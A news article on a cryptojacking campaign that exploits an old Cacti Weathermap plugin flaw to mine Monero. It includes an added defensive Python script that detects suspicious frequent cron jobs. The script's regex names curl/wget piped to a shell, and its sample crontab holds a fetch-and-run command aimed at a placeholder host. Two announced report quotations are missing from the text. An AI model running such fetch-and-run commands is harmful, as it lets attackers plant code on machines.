
Cryptojacking Campaign Uses Five-Year-Old Vulnerability to Rake in Monero

A nearly five-year-old vulnerability is reportedly being used to infect Linux servers with crypto-mining malware that lets hackers use them to mine the privacy-centric cryptocurrency Monero (XMR), according to US-based cybersecurity firm Trend Micro.

Per the firm’s report, hackers are taking advantage of a vulnerability found in the Network Weathermap plugin for Cacti. The vulnerability being exploited is tracked as CVE-2013-2618, and it allows hackers to gain code execution on the underlying servers. This way, they’re able to install a customized version of XMRig, a legitimate, open-source Monero mining software.

Researchers detail that the attackers are able to guarantee maximum uptime through the vulnerability, by checking in on the mining malware every three minutes, in case anyone shuts down the system. To avoid detection, the attackers are instructing XMRig to perform discreetly, by limiting the maximum amount of CPU resources it will take advantage of to mine.
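A defender can look for that three-minute check-in on a host. The following is an added example, not code from Trend Micro's report or from this article; it assumes the check-in is implemented as a cron job (the article gives only the interval), uses a risky-command heuristic chosen here, and runs over a constructed crontab in which the Cacti poller entry is the benign control.

```python
import re

# Assumption: the three-minute check-in is a cron job; the article gives only the interval.
# Heuristic (added here): fetch piped to a shell, or a command run from a world-writable directory.
RISKY_CMD = re.compile(r"\b(wget|curl)\b.*\|\s*(ba)?sh\b|(^|\s)/(tmp|var/tmp|dev/shm)/")

def expand_minutes(field):
    """Expand a cron minute field ('*', '*/3', '0-30/5', '1,4,7') into sorted minutes."""
    minutes = set()
    for part in field.split(","):
        rng, _, step = part.partition("/")
        step = int(step) if step else 1
        if rng == "*":
            lo, hi = 0, 59
        elif "-" in rng:
            lo, hi = map(int, rng.split("-"))
        else:
            lo = int(rng)
            hi = 59 if "/" in part else lo
        minutes.update(range(lo, hi + 1, step))
    return sorted(minutes)

def longest_gap(minutes):
    """Longest wait in minutes between consecutive runs, wrapping around the hour."""
    if len(minutes) < 2:
        return 60
    gaps = [b - a for a, b in zip(minutes, minutes[1:])]
    gaps.append(60 - minutes[-1] + minutes[0])
    return max(gaps)

def suspicious_jobs(crontab_text, threshold=3):
    """Return (line_no, line) for every-hour, every-day jobs that run at least
    every `threshold` minutes and match RISKY_CMD."""
    hits = []
    for n, line in enumerate(crontab_text.splitlines(), 1):
        line = line.strip()
        fields = line.split(None, 5)
        if line.startswith("#") or len(fields) < 6 or fields[1:5] != ["*"] * 4:
            continue  # comments, VAR=value lines, @reboot and narrower schedules
        try:
            gap = longest_gap(expand_minutes(fields[0]))
        except ValueError:
            continue  # malformed or named minute field
        if gap <= threshold and RISKY_CMD.search(fields[5]):
            hits.append((n, line))
    return hits

# Constructed sample crontab; host name and paths are placeholders.
SAMPLE = """\
MAILTO=root
# constructed sample entries
*/5 * * * * /usr/bin/php /var/www/html/cacti/poller.php
*/3 * * * * curl -s http://example.invalid/w | sh
0,30 * * * * /tmp/report.sh
* * * * * /var/tmp/.x/watch
@reboot /usr/local/bin/start-agent
"""
```

Calling `suspicious_jobs(SAMPLE)` flags lines 4 and 6; the five-minute Cacti poller and the twice-hourly `/tmp` job fall outside the three-minute threshold.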

Notably, a patch for the vulnerability has reportedly been available for about five years. Some users may still be unknowingly mining Monero for the hackers, despite being able to easily fix the problem. Trend Micro’s report reads:

The flaw was initially identified five years ago, in April 2013, in the Weathermap plugin. The open-source plugin is used by ISPs, internet exchanges, Fortune 500 companies, and telecom network to map network activity.

The cryptojacking campaign is mainly targeting publicly accessible x86-64 Linux servers throughout the world, with the most affected countries being Japan, Taiwan, China, the United States, and India.


Trend Micro researchers managed to discover two Monero wallets receiving the ill-gotten funds, and noted the campaign netted hackers 320 Monero (roughly $63,000) as of March 21. They noted, however, that this campaign is connected to one that used JenkinsMiner malware on Windows machines, and raked in at least $3 million worth of XMR.

Users can protect their machines by simply keeping their systems patched. Those running Cacti’s Network Weathermap plugin, researchers note, need to secure their data and keep it away from public servers. The firm’s report reads:

Notable cryptojacking victims include Tesla and Starbucks, whose Wi-Fi was found using people’s laptops to mine. A malware campaign also managed to hijack millions of Android devices to mine earlier this year.


27.03.2018 / 05:50 80